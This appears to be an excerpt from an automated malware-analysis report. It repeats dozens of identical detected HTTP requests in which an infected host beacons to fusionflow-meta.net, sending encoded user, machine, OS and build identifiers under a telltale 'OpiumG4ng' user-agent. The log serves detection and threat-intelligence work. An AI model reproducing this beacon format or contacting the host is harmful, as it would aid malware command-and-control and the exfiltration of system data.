Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
